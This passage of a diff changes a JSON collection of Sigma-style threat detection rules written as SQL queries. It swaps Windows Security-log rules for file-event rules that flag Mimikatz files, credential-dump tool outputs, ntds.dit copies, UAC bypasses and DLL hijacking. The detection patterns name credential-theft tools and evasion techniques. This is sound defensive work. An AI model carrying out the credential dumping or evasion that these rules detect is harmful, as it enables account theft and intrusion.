LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.docx' 
ESCAPE '\\' OR TargetFilename LIKE '%.rtf' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup%' ESCAPE '\\') OR ((TargetFilename LIKE '%.xlt' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.xls' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\EXCEL.exe' ESCAPE '\\')))" ], - "filename": "win_security_susp_kerberos_manipulation.yml" + "filename": "file_event_win_word_template_creation.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - Security", - "id": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Mimikatz Kirbi File Creation", + "id": "9e099d99-44c2-42b6-a6d8-54c3545cab29", + "status": "test", + "description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.", + "author": "Florian Roth (Nextron Systems), David ANDRE", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1558" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%mshta%' ESCAPE '\\' AND ServiceFileName LIKE '%vbscript:createobject%' ESCAPE '\\' AND ServiceFileName LIKE '%.run%' ESCAPE '\\' AND ServiceFileName LIKE '%window.close%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.kirbi' ESCAPE '\\' OR TargetFilename LIKE '%mimilsa.log' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml" + "filename": 
"file_event_win_hktl_mimikatz_files.yml" }, { - "title": "PetitPotam Suspicious Kerberos TGT Request", - "id": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", + "title": "Legitimate Application Dropped Executable", + "id": "f0540f7e-2db3-4432-b9e0-3965486744bc", "status": "experimental", - "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", - "author": "Mauricio Velazco, Michael Haag", + "description": "Detects programs on a Windows system that should not write executables to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.credential_access", - "attack.t1187" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4768' AND TargetUserName LIKE '%$' ESCAPE '\\' AND CertThumbprint LIKE '%' ESCAPE '\\') AND NOT ((IpAddress = '::1') OR (CertThumbprint = '')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\'))" ], - "filename": "win_security_petitpotam_susp_tgt_request.yml" + "filename": "file_event_win_legitimate_app_dropping_exe.yml" }, { - "title": "Important Scheduled Task Deleted/Disabled", - "id": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", - "status": "experimental", - "description": "Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + 
"title": "UAC Bypass Abusing Winsat Path Parsing - File", + "id": "155dbf56-e0a4-4dd0-8905-8a98705045e8", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4699', '4701') AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\Schedule%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((EventID = '4699' AND SubjectUserName LIKE '%$' ESCAPE '\\' AND TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winmm.dll' ESCAPE '\\'))" ], - "filename": "win_security_susp_scheduled_task_delete_or_disable.yml" + "filename": "file_event_win_uac_bypass_winsat.yml" }, { - "title": "Remote PowerShell Sessions Network Connections (WinRM)", - "id": "13acf386-b8c6-4fe0-9a6e-c4756b974698", + "title": "Cred Dump Tools Dropped Files", + "id": "8fbf3271-1ef6-4e94-8210-03c2317947f6", "status": "test", - "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", - "author": "Roberto Rodriguez 
@Cyb3rWard0g", + "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.003", + "attack.t1003.004", + "attack.t1003.005" ], "falsepositives": [ - "Legitimate use of remote PowerShell execution" + "Legitimate Administrator using tool for password recovery" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5156' AND DestPort IN ('5985', '5986') AND LayerRTID = '44')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\pwdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\kirbi%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwhashes%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_ccache%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_krbtkts%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgdump-log%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\test.pwd' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora64.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wceaux.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SECURITY.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SYSTEM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NTDS.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpExt.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpSvc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pstgdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR 
TargetFilename LIKE '%\\\\Dumpy.exe' ESCAPE '\\'))" ], - "filename": "win_security_remote_powershell_session.yml" + "filename": "file_event_win_cred_dump_tools_dropped_files.yml" }, { - "title": "Generic Password Dumper Activity on LSASS", - "id": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", - "status": "experimental", - "description": "Detects process handle on LSASS process with certain access mask", - "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", + "title": "Creation Exe for Service with Unquoted Path", + "id": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", + "status": "test", + "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "car.2019-04-004", - "attack.t1003.001" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4656' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessMask LIKE '%0x40%' ESCAPE '\\' OR AccessMask LIKE '%0x1400%' ESCAPE '\\' OR AccessMask LIKE '%0x100000%' ESCAPE '\\' OR AccessMask LIKE '%0x1410%' ESCAPE '\\' OR AccessMask LIKE '%0x1010%' ESCAPE '\\' OR AccessMask LIKE '%0x1438%' ESCAPE '\\' OR AccessMask LIKE '%0x143a%' ESCAPE '\\' OR AccessMask LIKE '%0x1418%' ESCAPE '\\' OR AccessMask LIKE '%0x1f0fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f1fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f2fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f3fff%' ESCAPE '\\')) OR (EventID = '4663' AND ObjectName LIKE 
'%\\\\lsass.exe' ESCAPE '\\' AND (AccessList LIKE '%4484%' ESCAPE '\\' OR AccessList LIKE '%4416%' ESCAPE '\\'))) AND NOT (((ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\minionhost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\VsTskMgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\GamingServices.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MRT.exe' ESCAPE '\\' OR ProcessName LIKE '%RtkAudUService64' ESCAPE '\\') AND (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWow64\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysNative\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\taskhostw.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 
'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\aurora\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE '%\\\\x64\\\\SCENARIOENGINE.EXE' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND ProcessName LIKE '%\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\program.exe' ESCAPE '\\'" ], - "filename": "win_security_susp_lsass_dump_generic.yml" + "filename": "file_event_win_creation_unquoted_service_path.yml" }, { - "title": "Credential Dumping Tools Service Execution - Security", - "id": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", - "status": "test", - "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Suspicious Process Writes Ntds.dit", + "id": "11b1ed55-154d-4e82-8ad7-83739298f720", + "status": "experimental", + "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.execution", - "attack.t1003.001", "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + "attack.t1003.003" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%fgexec%' ESCAPE '\\' OR ServiceFileName LIKE '%dumpsvc%' ESCAPE '\\' OR ServiceFileName LIKE '%cachedump%' ESCAPE '\\' OR ServiceFileName LIKE 
'%mimidrv%' ESCAPE '\\' OR ServiceFileName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceFileName LIKE '%servpw%' ESCAPE '\\' OR ServiceFileName LIKE '%pwdump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\'))" ], - "filename": "win_security_mal_creddumper.yml" + "filename": "file_event_win_susp_ntds_dit.yml" }, { - "title": "Win Susp Computer Name Containing Samtheadmin", - "id": "39698b3f-da92-4bc6-bfb5-645a98386e45", + "title": "Suspicious Get-Variable.exe Creation", + "id": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", "status": "experimental", - "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", - "author": "elhoim", + "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", + "author": "frack113", "tags": [ - "cve.2021.42278", - "cve.2021.42287", "attack.persistence", - "attack.privilege_escalation", - "attack.t1078" + "attack.t1546", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((SamAccountName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND SamAccountName LIKE '%$' ESCAPE '\\') OR (TargetUserName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE 
TargetFilename LIKE '%Local\\\\Microsoft\\\\WindowsApps\\\\Get-Variable.exe' ESCAPE '\\'" ], - "filename": "win_security_susp_computer_name.yml" + "filename": "file_event_win_susp_get_variable.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", - "id": "fd0f5778-d3cb-4c9a-9695-66759d04702a", + "title": "DLL Search Order Hijackig Via Additional Space in Path", + "id": "b6f91281-20aa-446a-b986-38a92813a18f", "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", + "author": "frack113, Nasreddine Bencherchali", "tags": [ + "attack.persistence", + "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1027" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ServiceFileName REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ServiceFileName REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ServiceFileName REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ServiceFileName REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ServiceFileName REGEXP '\\$VerbosePreference\\.ToString\\(' OR ServiceFileName REGEXP '\\String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86) \\\\%' 
ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" + "filename": "file_event_win_dll_sideloading_space_path.yml" }, { - "title": "Security Eventlog Cleared", - "id": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", + "title": "WMI Persistence - Script Event Consumer File Write", + "id": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", "status": "test", - "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects file writes of WMI script event consumer", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.t1546.003", + "attack.persistence" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '517' AND Provider_Name = 'Security') OR (EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')))" + "SELECT * FROM logs WHERE NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\'" ], - "filename": "win_security_susp_eventlog_cleared.yml" + "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml" }, { - "title": "DiagTrackEoP Default Login Username", - "id": "2111118f-7e46-4fc8-974a-59fd8ec95196", + "title": "LSASS Process Dump Artefact In CrashDumps Folder", + "id": "6902955a-01b7-432c-b32a-6f5f81d8f625", "status": "experimental", - "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the presence of an LSASS dump file 
in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", + "author": "@pbssubhash", "tags": [ - "attack.privilege_escalation" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Rare legitimate dump of the process by the operating system due to a crash of lsass" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND TargetOutboundUserName = 'thisisnotvaliduser')" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%lsass.exe.%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')" ], - "filename": "win_security_diagtrack_eop_default_login_username.yml" + "filename": "file_event_win_lsass_shtinkering.yml" }, { - "title": "RDP over Reverse SSH Tunnel WFP", - "id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", + "title": "CVE-2021-44077 POC Default Dropped File", + "id": "7b501acf-fa98-4272-aa39-194f82edc8a3", "status": "experimental", - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", - "author": "Samir Bousseaden", + "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1090.001", - "attack.t1090.002", - "attack.t1021.001", - "car.2013-07-002" + "attack.execution", + "cve.2021.44077" ], "falsepositives": [ - "Programs that connect locally to the RDP port" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs 
WHERE (Channel = 'Security' AND (EventID = '5156' AND ((SourcePort = '3389' AND (DestAddress LIKE '127.%' ESCAPE '\\' OR DestAddress LIKE '::1' ESCAPE '\\')) OR (DestPort = '3389' AND (SourceAddress LIKE '127.%' ESCAPE '\\' OR SourceAddress LIKE '::1' ESCAPE '\\')))) AND NOT ((FilterOrigin = 'AppContainer Loopback') OR ((Application LIKE '%\\\\thor.exe' ESCAPE '\\' OR Application LIKE '%\\\\thor64.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\ManageEngine\\\\SupportCenterPlus\\\\bin\\\\msiexec.exe' ESCAPE '\\'" ], - "filename": "win_security_rdp_reverse_tunnel.yml" + "filename": "file_event_win_cve_2021_44077_poc_default_files.yml" }, { - "title": "Suspicious Scheduled Task Creation", - "id": "3a734d25-df5c-4b99-8034-af1ddb5883a4", + "title": "Suspicious Interactive PowerShell as SYSTEM", + "id": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", "status": "experimental", - "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Administrative activity", + "PowerShell scripts running as SYSTEM user" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\PowerShell\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\PowerShell\\\\StartupProfileData-Interactive' ESCAPE '\\')" + ], + "filename": "file_event_win_susp_system_interactive_powershell.yml" + }, + { + "title": "Potential Remote Credential Dumping Activity", + "id": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", + 
"status": "experimental", + "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", + "author": "SecurityAura", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND (TaskContent LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContent LIKE '%regsvr32%' ESCAPE '\\' OR TaskContent LIKE '%rundll32%' ESCAPE '\\' OR TaskContent LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContent LIKE '%cmd%' ESCAPE '\\' OR TaskContent LIKE '%/c %' ESCAPE '\\' OR TaskContent LIKE '%/k %' ESCAPE '\\' OR TaskContent LIKE '%/r %' ESCAPE '\\' OR TaskContent LIKE '%powershell%' ESCAPE '\\' OR TaskContent LIKE '%pwsh%' ESCAPE '\\' OR TaskContent LIKE '%mshta%' ESCAPE '\\' OR TaskContent LIKE '%wscript%' ESCAPE '\\' OR TaskContent LIKE '%cscript%' ESCAPE '\\' OR TaskContent LIKE '%certutil%' ESCAPE '\\' OR TaskContent LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContent LIKE '%bash.exe%' ESCAPE '\\' OR TaskContent LIKE '%bash %' ESCAPE '\\' OR TaskContent LIKE '%scrcons%' ESCAPE '\\' OR TaskContent LIKE '%wmic %' ESCAPE '\\' OR TaskContent LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContent LIKE '%forfiles%' ESCAPE '\\' OR TaskContent LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContent LIKE 
